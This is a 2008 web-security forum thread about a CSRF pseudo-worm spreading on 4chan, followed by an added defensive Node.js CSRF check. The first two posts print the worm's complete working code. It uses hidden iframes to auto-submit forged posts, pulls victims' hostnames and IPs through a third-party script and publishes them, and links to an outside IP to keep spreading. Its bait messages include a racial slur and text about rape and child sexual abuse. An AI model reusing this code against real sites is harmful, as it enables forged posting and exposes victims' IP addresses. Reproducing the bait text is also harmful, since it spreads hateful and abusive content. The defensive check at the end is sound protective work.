Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
CSRF pseudo-worm propagating on 4chan
Posted by: Skuld
Date: February 18, 2008 02:45PM

If any of you ever go to 4chan's /b/ board, you might find this interesting. There is at this moment a pseudo-worm propagating on /b/ using CSRF and social engineering to spread. Here is the code it's using.

var list = [];
list[0] = "Read_about_Scientology's_'secular_book_of_morals'_recruitment_program_from_their_own_documents.";
list[1] = "Truth_be_known,_those_silly_MooSlimes_sure_do_like_their_lil_boys:";
list[2] = "Truly,_the_COLD-HEARTED_BASTARD_christian_god_is_one_sick_fuck.";
list[3] = "This_is_not_a_joke:_Mike_Huckabee_confesses_to_eating_fried_squirrel_(rodent!!!!!!!!!)";
list[4] = "Holly_cow!__This_is_very_very_scary.";
list[5] = "I_am_concerned_about__Zayn_Gil's_activities.__He_has_bomb_instructions_on_the_net:";
list[6] = "I_never_thought_I'd_say_it,_but_this_shit_has_gone_TOO_FAR:";
list[7] = "This_is_amazing.__I_couldn't_stop_laughing.";
list[8] = "Anonymous_delivers:";
list[9] = "Watch_the_video!";
list[10] = "You_people_joke_about_rape,_but_look_at_what_was_done_to_this_poor_woman:";
list[11] = "Here's_some_footage_from_our_local_KKK_meeting_in_which_we_lynched_some_no-good_niggers:";
list[12] = "it's_not_rape_if_you_kill_her_first";
list[13] = "Leaked_footage_of_young_girl_being_sexually_abused_and_murdered:";
list[14] = "They_say_the_best_gift_you_can_give_to_a_woman_is_the_gift_of_RAEP:";
list[15] = "This_is_what_rape_really_looks_like.__I_hope_you_feel_good_about_yourselves.";

var thread = parseInt( location.href.match(/t=\d+/)[0].match(/\d+/)[0] );
var comment = parseInt( location.href.match(/c=\d+/)[0].match(/\d+/)[0] );
if (Math.random()*3 < 1) comment = list.length;
if (comment >= list.length) comment = Math.floor(Math.random()*list.length);

var i;
thread = thread + Math.floor(Math.random()*1000); // reduced from 1000 to 500 for 7chan
for (i = 0; i < 50; i++) {
document.write( "<iframe src=\"post.htm?t=" );
document.write( thread + i );
document.write( "&c=" + comment );
document.write( "&m=" + list[comment] );
document.write( "\" height=0 width=0></iframe>" );
}

Re: CSRF pseudo-worm propagating on 4chan
Posted by: Skuld
Date: February 18, 2008 02:49PM

Here is post.htm.

<script language="JavaScript" src="http://scripts.hashemian.com/js/visitorIPHOST.js.php"></script>
<script type="text/javascript" language="Javascript"><!--
document.write("<fo"+"rm name='post' action='http://dat.4chan.org/b/imgboard.php' method='POST' enctype='multipart/form-data'>"
+"<input type=hidden name=resto>"
+"<input type=hidden name=email>"
+"<input type=hidden name=com>"
+"<input type=hidden name=mode value='regist'>"
+"</form>");
var args = location.href.match(/t=\d+&c=\d+/)[0];
var msg = location.href.match(/m=.*/)[0].substring(2).replace(/_/g," ");
post.resto.value = args.match(/\d+/)[0];
post.email.value = VIH_HostName + " (" + VIH_HostIP + ")";
post.com.value = msg + "\n\nhttp://204.2.183.2/thetragicreality2008/?" + args;
post.submit();
//--></script>

Re: CSRF pseudo-worm propagating on 4chan
Posted by: ZeroJack
Date: February 19, 2008 01:14AM

Yup, it was created by someone from 711chan, but seems to be gone now.

There is a new one that attempts to spam 4chanarchive requests resulting in a ban.

It is a tinyurl that links to http://www.geocities.com/antianonymous08 which uses the same method as above.

Re: CSRF pseudo-worm propagating on 4chan
Posted by: asilvermtzion
Date: June 25, 2008 02:52AM

lol at some of the posts, how were they injecting that?

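Added example, not part of the thread and not code from any board named in it: a server-side check that would refuse the auto-submitted form quoted in post.htm, using an Origin/Referer test plus a signed double-submit token, which works without user logins. The origin, secret, cookie and field name `csrf`, and the function names are assumptions made for illustration.

```javascript
const crypto = require("crypto");

// Assumptions, not from the thread: the board's origin and a server-side secret.
const BOARD_ORIGIN = "https://board.example";
const SECRET = crypto.randomBytes(32);

function sign(value) {
  return crypto.createHmac("sha256", SECRET).update(value).digest("hex");
}

// Run when the reply form is rendered: `cookie` goes in a Set-Cookie header,
// `field` in a hidden input. A third-party page can read neither.
function issueCsrfPair() {
  const cookie = crypto.randomBytes(16).toString("hex");
  return { cookie, field: sign(cookie) };
}

// Returns null if the post may proceed, otherwise the reason for rejecting it.
function rejectReason(req) {
  if (req.method !== "POST") return "method";
  // Browsers send Origin on cross-site form POSTs; fall back to Referer.
  const source = req.headers.origin || req.headers.referer || "";
  let origin;
  try { origin = new URL(source).origin; } catch { return "no-origin"; }
  if (origin !== BOARD_ORIGIN) return "cross-site";
  // The hidden field must be the HMAC of the cookie the browser sent.
  const expected = Buffer.from(sign(req.cookies.csrf || ""));
  const given = Buffer.from(req.fields.csrf || "");
  if (given.length !== expected.length) return "bad-token";
  return crypto.timingSafeEqual(given, expected) ? null : "bad-token";
}

// Constructed requests. `forged` has the shape of the auto-submitted form in
// post.htm: same field names, sent from another site, victim's cookie attached.
const pair = issueCsrfPair();
const forged = {
  method: "POST", headers: { origin: "http://attacker.example" },
  cookies: { csrf: pair.cookie },
  fields: { resto: "1", email: "", com: "constructed", mode: "regist" },
};
const genuine = {
  method: "POST", headers: { origin: BOARD_ORIGIN },
  cookies: { csrf: pair.cookie },
  fields: { resto: "1", com: "constructed", mode: "regist", csrf: pair.field },
};

console.log(rejectReason(forged), rejectReason(genuine));
```

The token check still holds when a client sends neither Origin nor Referer only if such requests are rejected, as here; accepting them would leave the token as the sole barrier.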